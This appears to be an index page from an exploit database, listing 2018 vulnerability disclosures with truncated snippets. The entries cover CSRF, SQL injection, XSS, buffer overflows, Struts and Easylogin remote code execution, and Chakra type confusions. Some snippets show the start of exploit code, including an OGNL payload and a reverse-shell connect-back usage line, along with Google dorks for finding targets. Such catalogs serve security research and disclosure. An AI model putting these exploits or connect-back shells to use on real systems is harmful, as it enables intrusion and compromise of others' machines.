Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)

Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery Add Admin Date: 2018-08-24 Exploit Author: GunEggWang Vendor Homepage: https://gleezcms.org/ Software Link: https://github.com/gleez/cms Version: 1.2.0 CVE : CVE-2018-15845 Description: There is a CSRF vulnerability that can add an...

CuteFTP 5.0 - Buffer Overflow

Exploit Title: CuteFTP 5.0 - Buffer Overflow Author: Matteo Malvica Date: 2018-08-26 Vendor homepage: www.globalscape.com Software: CuteFTP 5.0.4 XP - build 54.8.6.1 Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe Tested on: Windows XP Profesional SP3...

ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting

Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Software : ZOHO Corp ManageEngine ADManager Plus Product Versio...

Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)

!/usr/bin/env python3 coding=utf-8 struts-pwn: Apache Struts CVE-2018-11776 Exploit Author: Mazin Ahmed This code uses a payload from: https://github.com/jas502n/St2-057 import argparse import random import requests import sys try: from urllib import parse as urlparse except ImportError: import...

WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection

Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'templateid' SQL Injection Google Dork: intext:"/wp-content/plugins/gift-voucher/" Date: 2018-08-23 Exploit Author: Renos Nikolaou Software Link: https://wordpress.org/plugins/gift-voucher/ Vendor Homepage: http://www.codemenschen.at/ Version:...

Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)

!/usr/bin/python -- coding: utf-8 -- hook-s3c github.com/hook-s3c, @hooks3c on twitter import sys import urllib import urllib2 import httplib def exploithost,cmd: print "Execute: ".formatcmd ognlpayload = "$" ognlpayload += "memberAccess'allowStaticMethodAccess'=true." ognlpayload +=...

ManageEngine ADManager Plus 6.5.7 - HTML Injection

Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection Date: 2018-08-21 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.manageengine.com/ Hardware Link : https://www.manageengine.com/products/ad-manager/ Software : ZOHO Corp ManageEngine ADManager Plus Product Version: 6.5...

UltimatePOS 2.5 - Remote Code Execution

Exploit Title: UltimatePOS 2.5 - Remote Code Execution Google Dork: intext:"UltimatePOS" Date: 2018-08-22 Exploit Author: Renos Nikolaou Vendor Homepage: http://ultimatefosters.com/ Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431 Version: 2.5...

Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)

Title: Vox TG790 ADSL Router - Cross-Site Request Forgery Add Admin Author: Cakes Exploit Date: 2018-08-01 Vendor: Vox Telecom Link: https://www.vox.co.za/ Firmware Version: 6.2.W.1 CVE: N/A Description Due to improper session management low privilege users are able to create administrator accoun...

SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)

Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-08-23 Vendor Homepage: https://www.skype.com/es/home/ Tested Version: 12.8.487.0 Vulnerability Type: Denial of Service DoS Local Tested on OS: Windows 10 Pro x...

PCViewer vt1000 - Directory Traversal

Exploit Title: PCViewer vt1000 - Directory Traversal Exploit Author: Berk Dusunur Google Dork: N/A Type: Hardware Date: 2018-07-21 Vendor Homepage: N/A Software Link: http://www.softpedia.com/get/System/File-Management/Pc-Viewer.shtml Affected Version: vt1000 Tested on: Parrot OS CVE : N/A Proof ...

StyleWriter 4 1.0 - Denial of Service (PoC)

Exploit Title: StyleWriter 4 1.0 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-23 Homepage: http://www.editorsoftware.com Software Link: http://www.editorsoftware.com/StyleWriterDownload.php Tested Version: 1.0 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run...

Epiphany Web Browser 3.28.1 - Denial of Service (PoC)

Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service PoC Author: Dhiraj Mishra Date: 2018-08-23 Software: https://projects-old.gnome.org/epiphany/ Version: 3.28.1 CVE: N/A Tested on: Ubuntu 18 64bit Steps to reproduce: 1. Open epiphany browser 2. Bookmark any random page 3. Then navigat...

Twitter-Clone 1 - 'code' SQL Injection

Exploit Title: Twitter-Clone 1 - 'code' SQL Injection Date: 2018-08-22 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 vulnerable files : mailactivation.php , stalkers.php , search.php vulnerable parameters : name , code , id...

CuteFTP 8.3.1 - Denial of Service (PoC)

Exploit Title : CuteFTP 8.3.1 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : http://www.cuteftp.com/ Software Link Download : https://filehippo.com/downloadcuteftppro/4518/ Tested on : Windows 10 - 64-bit Steps to Reproduce Run the...

Geutebrueck re_porter 16 - Cross-Site Scripting

Exploit Title: Geutebrueck reporter 16 - Cross-Site Scripting Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prior 7.8.974.20 CVE-2018-15533 Attack Vectors...

Ghostscript - Multiple Vulnerabilities

http://seclists.org/oss-sec/2018/q3/142 These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools. ---- Hello, this was discussed on the distros list, but it was suggested to move discussion to oss-security. You might recall I...

Easyboot 6.6.0 - Denial Of Service (PoC)

Exploit Title: Easyboot 6.6.0 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: http://www.ezbsystems.com/easyboot/download.htm Tested Version: 6.6.0 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pytho...

UltraISO 9.7.1.3519 - Denial Of Service (PoC)

Exploit Title : UltraISO 9.7.1.3519 - Denial Of Service PoC Exploit Author : Ali Alipour WebSite : Alipour.it Date: 2018-08-22 Vendor Homepage : https://www.ultraiso.com Software Link Download : https://www.ultraiso.com/download.html Tested on : Windows 10 - 64-bit Steps to Reproduce Run the pyth...

Softdisk 3.0.3 - Denial Of Service (PoC)

Exploit Title: Softdisk 3.0.3 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: http://www.ezbsystems.com/ Software Link: https://www.ezbsystems.com/softdisc/download.htm Tested Version: 3.0.3 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pyth...

Geutebrueck re_porter 7.8.974.20 - Credential Disclosure

Exploit Title: Geutebrueck reporter 7.8.974.20 - Credential Disclosure Date: 2018-08-03 Exploit Author: Kamil Suska Vendor: https://www.geutebrueck.com/enUS.html Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html Version: prior 7.8.974.20 CVE-2018-15534 PoC GET...

ZyXEL VMG3312-B10B - Cross-Site Scripting

Exploit Title: ZyXEL VMG3312-B10B - Cross-Site Scripting Date: 2018-08-21 Exploit Author: Samet ŞAHİN Vendor Homepage: https://www.zyxel.com/ Software Link: ftp://ftp.zyxel.com.tr/ZyXELURUNLERI/MODEMLER/VDSLMODEMLER/VMG3312-B10B/ Version: ZyXEL VMG3312-B10B Tested on: Mozilla Firefox 61.0.2 &...

Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation

SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 2017 Summary The Diagnostics Hub Packaging library, used by Windows Standard Collector...

Project64 2.3.2 - Buffer Overflow (SEH)

Exploit Title: Project64 2.3.2 - Local BufferOverflow SEH Date: 2018-08-21 Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x8...

KingMedia 4.1 - File Upload

Exploit Title: KingMedia 4.1 - Remote Code Execution Author: Efren Diaz Exploit Date: 2018-08-15 Software: KingMedia Version: 1.x, 2.x, 3.x, 4.1 Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877 CVE: N/A \n\n"; echo " -target: http://site.com/... required\n"; echo ...

Textpad 7.6.4 - Denial Of Service (PoC)

Exploit Title: Textpad 7.6.4 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-22 Homepage: https://textpad.com Software Link: https://textpad.com/download/v76/win32/txpeng764-32.zip Tested Version: 7.6.4 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the pytho...

Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)

Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was discovered in Twitter-Clone 1 which allows a remote attacker ...

Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)

Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Date: 2018-08-21 Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530 DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0...

WordPress Plugin Ninja Forms 3.3.13 - CSV Injection

Exploit Title: Wordpress Plugin Ninja Forms 3.3.13 - CSV Injection Exploit Author: Mostafa Gharzi Website: https://www.certcc.ir Date: 2018-08-19 Google Dork: N/A Vendor: The WP Ninjas Software Link: https://wordpress.org/plugins/ninja-forms/ Affected Version: 3.3.13 and before Active...

Project64 2.3.2 - Denial Of Service (PoC)

Exploit Title: Project64 2.3.2 - Denial Of Service PoC. Author: Gionathan "John" Reale Discovey Date: 2018-08-21 Homepage: https://www.pj64-emu.com Software Link:https://www.pj64-emu.com/download/project64-latest Tested Version: 2.3.2 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run the...

OpenSSH 2.3 < 7.7 - Username Enumeration

Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Date: 2018-08-20 Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473 / \ / / | | | | | | | | | | | || | | | | | ' \ / \ ' \ \ \ | | | || | | | /...

Twitter-Clone 1 - 'userid' SQL Injection

Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 POC : SQLi vulnerable files : follow.php , index.php vulnerable parameters : userid , username 1...

WordPress Plugin Tagregator 0.6 - Cross-Site Scripting

Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Date: 2018-05-05 Exploit Author: ManhNho Vendor Homepage: https://wordpress.org/plugins/tagregator/ Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip Ref: https://pastebin.com/ZGr5tyP2 Version: 0.6 Tested...

MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery

Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Date: 2018-05-17 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu 18.04 1. Description: The plugin allows moderators to save notes a...

Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)

Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on OS: Windows 7 x64 Steps to Reproduce: Run the python...

SEIG Modbus 3.4 - Denial of Service (PoC)

Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...

Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

Countly - Cross-Site Scripting

Exploit Title: Countly-server StoredPersistent XSS Vulnerability Date: Monday - 2018 13 August Author: 10:10AM Team Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested on: GNU/Linux Ubuntu 16.04 - wi...

SEIG Modbus 3.4 - Remote Code Execution

Title: SEIG Modbus 3.4 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...

Restorator 1793 - Denial of Service (PoC)

Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS: Windows 7 x64 Steps to Reproduce: Run t...

Prime95 29.4b7 - Denial Of Service (PoC)

Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-20 Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run t...

WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection

Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched Version: 1.0.9 CVE : N/A WPVULNDB:...

SEIG SCADA System 9 - Remote Code Execution

Title: SEIG SCADA SYSTEM 9 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://www.schneider-electric.ie/en/download/document/V9Fullinstallationpackageregisterandreceivefile/ Version: v9 Tested on: Windows7 x...

Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion

/ Here's the method. template template void DictionaryPropertyDescriptor::CopyFromDictionaryPropertyDescriptor& descriptor this-Attributes = descriptor.Attributes; this-Data = descriptor.Data == DictionaryPropertyDescriptor::NoSlots ? NoSlots : descriptor.Data; this-Getter = descriptor.Getter ==...

CEWE Photoshow 6.3.4 - Denial of Service (PoC)

Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-17 Homepage: https://cewe-photoworld.com/ Software Link: https://cewe-photoworld.com/creator-software/windows-download Tested Version: 6.3.4 Tested on OS: Windows 10 Steps to Reproduc...

ADM 3.1.2RHG1 - Remote Code Execution

Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution Author: Matthew Fulton & Kyle Lovett Date: 2018-07-01 Vendor Homepage: https://www.asustor.com/ Software Link: http://download.asustor.com/download/adm/X64G33.1.2.RHG1.img Version: = ADM 3.1.2RHG1 Tested on: ASUSTOR AS6202T CVE : CVE-2018-11510...

Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

/ The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for...

Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion

/ This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemIA instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for...

Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl

/ If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag. In the PoC, it redefines Map.prototype.get to intercept the execution of...

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

/ Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Sotware Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android wherever it was...